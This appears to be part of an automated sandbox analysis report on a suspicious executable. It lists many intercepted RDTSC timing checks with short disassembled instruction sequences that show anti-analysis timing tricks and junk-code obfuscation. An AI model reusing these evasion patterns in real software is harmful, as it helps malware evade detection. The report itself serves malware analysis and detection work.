Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F7DE4 second address: 5F7DE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5EE205 second address: 5EE225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF8FC5098h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5C3124 second address: 5C3147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF9128037h 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FAAF9128026h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F847A second address: 5F8480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F8480 second address: 5F848C instructions: 0x00000000 rdtsc 0x00000002 js 00007FAAF9128026h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F8704 second address: 5F8708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F8708 second address: 5F8731 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAAF912802Ah 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jnp 00007FAAF912802Ah 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jne 00007FAAF9128026h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F8731 second address: 5F8735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F8735 second address: 5F8739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5FA6AE second address: 5FA6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jng 00007FAAF8FC5086h 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5FAE94 second address: 5FAEB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF9128035h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5FBECD second address: 5FBEE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC5096h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5FBEE7 second address: 5FBF04 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAAF9128028h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAF912802Dh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5FBF04 second address: 5FBF2C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAF8FC5086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FAAF8FC5094h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5FBF2C second address: 5FBF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 6005DF second address: 6005FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAAF8FC5086h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAF8FC508Fh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 6005FB second address: 6005FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 6005FF second address: 600605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 600605 second address: 600627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 je 00007FAAF912802Ch 0x0000000e js 00007FAAF9128026h 0x00000014 push ebx 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop ebx 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push esi 0x00000021 pop esi 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5C9CCF second address: 5C9CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5C9CD3 second address: 5C9CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 601BEB second address: 601BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 601BEF second address: 601BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAAF9128026h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 601BFB second address: 601C00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 601C00 second address: 601C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 601C0A second address: 601C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 601C15 second address: 601C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 601C19 second address: 601C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5BACD1 second address: 5BACE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAF912802Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 6048F8 second address: 604919 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAAF8FC5086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FAAF8FC5097h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 604919 second address: 60491E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 604A79 second address: 604A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAAF8FC5086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 604EC4 second address: 604EDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FAAF9128026h 0x00000009 jne 00007FAAF9128026h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 jng 00007FAAF9128032h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 604EDF second address: 604EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 6085CC second address: 6085D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 6085D2 second address: 6085EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAF8FC5096h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 6087BA second address: 6087BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 6087BE second address: 6087C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 6087C4 second address: 6087CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 6087CB second address: 6087DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jbe 00007FAAF8FC5090h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 608D41 second address: 608D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 6092B7 second address: 6092BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 609349 second address: 609350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 609350 second address: 60935D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 60935D second address: 609361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 609361 second address: 60939F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC5091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FAAF8FC5094h 0x00000011 popad 0x00000012 popad 0x00000013 xchg eax, ebx 0x00000014 adc si, 6CDDh 0x00000019 movzx esi, dx 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pushad 0x00000021 popad 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 609443 second address: 60944C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 6095CB second address: 6095CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 609903 second address: 609907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 609907 second address: 609922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC5097h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 609922 second address: 609999 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAF912802Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007FAAF9128030h 0x00000012 pop edi 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FAAF9128028h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 jns 00007FAAF9128026h 0x0000003b mov esi, ecx 0x0000003d xchg eax, ebx 0x0000003e jmp 00007FAAF9128039h 0x00000043 push eax 0x00000044 push ecx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 609999 second address: 60999D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 60A844 second address: 60A8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jns 00007FAAF9128036h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FAAF9128028h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D2E62h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FAAF9128028h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c push 00000000h 0x0000004e mov dword ptr [ebp+1247704Ch], ebx 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 ja 00007FAAF9128028h 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 60B98D second address: 60B997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FAAF8FC5086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 60CFB6 second address: 60CFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 60CFBA second address: 60CFC0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 60CFC0 second address: 60D026 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAAF9128028h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d movsx esi, bx 0x00000010 and edi, dword ptr [ebp+122D2E56h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FAAF9128028h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 or di, A571h 0x00000037 push 00000000h 0x00000039 mov esi, dword ptr [ebp+122D2EA2h] 0x0000003f xchg eax, ebx 0x00000040 js 00007FAAF912803Ch 0x00000046 push eax 0x00000047 pushad 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 60F09E second address: 60F0A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 60F0A4 second address: 60F114 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAF912802Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FAAF9128028h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 movzx esi, bx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007FAAF9128028h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 push 00000000h 0x00000048 jl 00007FAAF912802Ch 0x0000004e mov dword ptr [ebp+122D1D75h], ecx 0x00000054 push eax 0x00000055 pushad 0x00000056 jbe 00007FAAF9128028h 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 push edi 0x00000061 pop edi 0x00000062 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 612AAA second address: 612AFA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007FAAF8FC5086h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jmp 00007FAAF8FC5099h 0x00000013 pop eax 0x00000014 nop 0x00000015 mov bh, 0Dh 0x00000017 mov edi, edx 0x00000019 push 00000000h 0x0000001b or bh, 00000004h 0x0000001e push 00000000h 0x00000020 pushad 0x00000021 clc 0x00000022 popad 0x00000023 xchg eax, esi 0x00000024 jmp 00007FAAF8FC5093h 0x00000029 push eax 0x0000002a pushad 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 615AF3 second address: 615B88 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jbe 00007FAAF9128026h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FAAF9128028h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jmp 00007FAAF9128036h 0x0000002e add dword ptr [ebp+122D394Fh], ebx 0x00000034 pushad 0x00000035 jns 00007FAAF9128035h 0x0000003b mov dx, 8721h 0x0000003f popad 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007FAAF9128028h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 00000014h 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e mov ebx, dword ptr [ebp+122D1F2Dh] 0x00000064 push eax 0x00000065 push ecx 0x00000066 push edi 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 617BA0 second address: 617BBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC5090h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jp 00007FAAF8FC5086h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 617BBF second address: 617C1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007FAAF912802Ah 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D31D1h], edx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FAAF9128028h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 push edi 0x00000035 pushad 0x00000036 push esi 0x00000037 pop ecx 0x00000038 mov dword ptr [ebp+122D3A1Fh], ecx 0x0000003e popad 0x0000003f pop edi 0x00000040 ja 00007FAAF9128026h 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 jnl 00007FAAF912802Ch 0x0000004f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 618BD7 second address: 618C7D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FAAF8FC5088h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 ja 00007FAAF8FC5094h 0x0000002a jo 00007FAAF8FC508Eh 0x00000030 je 00007FAAF8FC5088h 0x00000036 push edi 0x00000037 pop edi 0x00000038 mov edi, ecx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FAAF8FC5088h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 mov bx, 84EEh 0x0000005a mov dword ptr [ebp+122D39B1h], ebx 0x00000060 push 00000000h 0x00000062 mov bl, E9h 0x00000064 mov bh, 9Fh 0x00000066 xchg eax, esi 0x00000067 jl 00007FAAF8FC509Ch 0x0000006d jmp 00007FAAF8FC5096h 0x00000072 push eax 0x00000073 pushad 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 618C7D second address: 618C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
